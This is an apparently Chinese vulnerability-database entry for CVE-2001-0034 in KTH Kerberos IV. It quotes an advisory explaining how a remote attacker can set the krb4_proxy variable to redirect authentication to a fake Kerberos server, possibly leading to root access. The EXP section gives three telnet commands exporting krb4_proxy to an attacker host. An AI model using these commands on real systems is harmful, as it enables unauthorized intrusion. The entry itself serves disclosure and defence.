KTH Kerberos IV漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106124 漏洞类型 未知
发布时间 2000-12-08 更新时间 2006-09-27
CVE编号 CVE-2001-0034 CNNVD-ID CNNVD-200102-114
漏洞平台 Multiple CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/20491
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200102-114
|漏洞详情
KTHKerberosIV存在漏洞。本地用户使用krb4_proxy变量说明交替的代理人,用户产生错误代理人响应回应和可能提升特权。
|漏洞EXP
source: http://www.securityfocus.com/bid/2090/info

Kerberos is a widely used network service authentication system. The version of Kerberos developed and maintained by KTH (Swedish Royal Institute of Technology) contains a vulnerability that may allow/assist in a local or remote root compromise.

KTH Kerberos uses an environment variable called 'krb4_proxy' when a proxy server is required to retrieve tickets via HTTP. KTH Kerberos-supported services will contact the supplied proxy server (the value of krb4_proxy) instead of the default Kerberos server if this variable is set.

It is possible for malicious remote users (before authenticating) to remotely set the value of this variable and have the server program contact a fake Kerberos server. This would allow the attacker to intercept authentication requests and/or send false replies to the service they are attempting to use. An attacker, for example, could send the environment variable via telnet to a Kerberos supporting telnet daemon.

This attack allows malicious users in control of a fake Kerberos server to exploit a buffer overflow vulnerability (See Bugtraq ID 2091) in the Kerberos shared libraries with malformed replies. If exploited, the combined vulnerabilities may provide remote root access to attackers. 

telnet> environ define krb4_proxy http://your.host:80
telnet> environ export krb4_proxy
telnet> open localhost
|参考资料

来源:BUGTRAQ
名称:20001210KTHupgradeandFIX
链接:http://archives.neohapsis.com/archives/bugtraq/2000-12/0105.html
来源:BUGTRAQ
名称:20001208VulnerabilitiesinKTHKerberosIV
链接:http://archives.neohapsis.com/archives/bugtraq/2000-12/0093.html
来源:XF
名称:kerberos4-arbitrary-proxy
链接:http://xforce.iss.net/static/5733.php